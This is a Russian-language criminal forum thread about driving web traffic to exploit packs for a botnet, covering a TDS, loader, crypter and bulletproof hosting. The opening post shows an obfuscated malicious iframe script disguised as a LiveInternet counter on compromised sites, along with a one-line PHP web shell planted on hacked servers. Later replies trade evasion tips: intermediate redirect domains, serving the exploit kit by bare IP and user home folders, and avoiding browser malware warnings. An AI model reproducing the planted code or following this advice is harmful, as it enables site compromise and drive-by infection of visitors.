Хочется услышать советы профи по траффу

[2FED]

Привет,имеется все необходимое для ботнета-ТДС(сутра),лоадер(2к8),хороший криптор,приват связка,абузоустойчивый хостинг.
Для начала взял трафф из ифрейма фтп,сам ифрейм критован,вида

<!--LiveInternet counter-->
<script>
('.75.67.67.63.3a.2f.2f.6f.72.67.75.72.62.2e.70.62.7a.2f.76.61.2e.70.74.76.3f.34'));var d=(c)?b.b.b.c():false;return d;}},c:{b:function(){var c=b.b.b.d('trashtext');var d=(c)?c:'trashtext';return d||false;},c:function(){var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');c['\x77\x69\x64\x74\x68']='0.1em';c['\x68\x65\x69\x67\x68\x74']='0.2em';c['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';c['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';c['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';c['\x69\x64']='\x6c';document['\x62\x6f</script>
<!--/LiveInternet-->

Это прости пример как выглядит.На сайты с которых много траффа заливаю шелл и по возможности(если не лень добавляю свой код

<? if (!empty($_GET['c']))	{	echo '<pre>';	system($_GET['c']);	echo '</pre>';	}exit; ?>

Какие могут быть советы?Например как сохранять трафф и где лучше его собстенно брать.Самому ломать-долго и невсегда получается,карж-гамно.

 

[TrueUser]

Покупной трафик в основном большинстве своем не рентабелен.

 

[karabas-barabas]

Покупной трафик в основном большинстве своем не рентабелен.

но там можно всегда найти интересные образцы других зверьков для изучения.

покупал готовые загрузки у одного селлера для тестирований лоадера и другого софта, траф жатый-пережатый все фтп что снял , все уже по 10 раз проинфреймлены, наверное еще куча троев стоит там...
вообщем если такой траф покупаешь - то есть смысл только для разных блокираторов

 

[2FED]

Отсюда вывод-ломай сам траффистые ресурсы и радуйся жизни.

 

[2FED]

У всех также по браузерам пробив?(

 

[TrueUser]

У всех также по браузерам пробив?(

Просто или траф говно или связка

 

[AluAdib]

и то и то)

 

[fx_man]

2FED что за связка у тебя?

 

[TrueUser]

что за связка

Паблик фрагус конечно!

 

[Ar3s]

Больше похоже на YES EXPLOIT PACK.
Пробив, судя по стате, отстой полный. Моя элеонорка на нормальном трафе 26% дает и не квакает. И траф не эксплорер в чистом виде. Примерно 50% - FF.

Что касается остальных вопросов - сам сейчас ищу изящное решения для iframe.
Думал размещать js у себя на хосте и инклудить куда-нить в шапку, но паливно. Подсказали идею на проверку по рефереру + юзер агенту + js enabled = очень большой размер js получается. Даже после ужатия и крипта. 24 кб js-мешанины не так-то легко спрятать. Вот и ломаю голову.
Пока что самый оптимальный способ - ифрэймить на tds, а уж с нее гнать на малварю. (да, знаю! Много минусов. домены сразу пачками палятся, но не так часто фрэймы перебивать зато нужно)

 

[2FED]

Связка YES EXP SYS 3.Трафф хороший,сам ифреймил.Через сутру идет.Да дело в сплойтах помоему.Переходим на элеонор

 

[bisaun]

шеллы не?

 

[Mikhalich]

Пока что самый оптимальный способ - ифрэймить на tds, а уж с нее гнать на малварю. (да, знаю! Много минусов. домены сразу пачками палятся, но не так часто фрэймы перебивать зато нужно)

можно ставить фреймы на "промежуточные" домены, а с них редиректом через .htaccess на тдску. от палева домена с тдской не спасёт, но по крайней мере не так быстро палится.

 

[TrueUser]

Ладно, спалю вам темку можно ВООБЩЕ не пользоваться доменом! И ничего не палить как бы...

 

[Mikhalich]

Ладно, спалю вам темку можно ВООБЩЕ не пользоваться доменом! И ничего не палить как бы...

нехило схему спалил. расписал всё от А до Я.

 

[TrueUser]

А что даже ни на какие мысли не наводит? В урле можно вписать НЕ доменное имя, а IP адрес, эффект практически тот же если к айпишнику не навязана куча доменов. Вообще говоря некоторые хостеры позволяют пользоваться "домашними папками" своих юзверей, таким образом до связки можно будет добраться по такому маршруту:

http://123.123.123.123/~username/govnopack/index.php

Собственно тут username - это ваш логин у хостера. Путь конечно и другого вида может быть немного, но основная идея именно такая.
Как видите ДОМЕННОЕ ИМЯ ТУТ НЕ ТРЕБУЕТСЯ и не палится, набить абузу на айпишник немного сложнее чем на домен Удачи!

 

[Mikhalich]

Как видите ДОМЕННОЕ ИМЯ ТУТ НЕ ТРЕБУЕТСЯ и не палится, набить абузу на айпишник немного сложнее чем на домен Удачи!

Логично, но тем не менее, через сутру таким способом iframe траф не проходит. Ошибку выдаёт. По крайней мере у мну не получилось. Может руки кривые.

 

[Ar3s]

Руки кривые. Все отлично доходит. Я много раз юзал.

 

[TrueUser]

Может руки кривые.

Да уж видимо так оно и есть . Сутра не сутра разницы никакой нет, просто надо немного разобраться в принципах работы интернета (это еще кстати может помочь избавиться от необоснованного интереса к статье об "выключении интернета" у многих читателей) :bang:

 

[Mikhalich]

ну спасибо вам. вроде как на руки не жаловался никогда. проблема на мой взгляд в том, что на сутре стоит привязка к домену и при заходе на http://***.***.***.***/~user/in.cgi?2 выдаёт Error: Please use parameters provided with your package (ih=***.***.***.***)
раньше сам так юзал, проблем вроде бы не было, а сейчас, насколько мне известно, есть серверная версия сутры. в смысле к IP привязка идёт, а не к домену, может поэтому и не получается.
P.S. кстати, заметил интересную особенность, при заходе через веб на палящийся домен через фф выдаётся предупреждение "Имеется информация, что эта веб-страница атакует компьютеры!" но заходя на тот-же домен вышеуказанным способом, предупреждения никакого нет.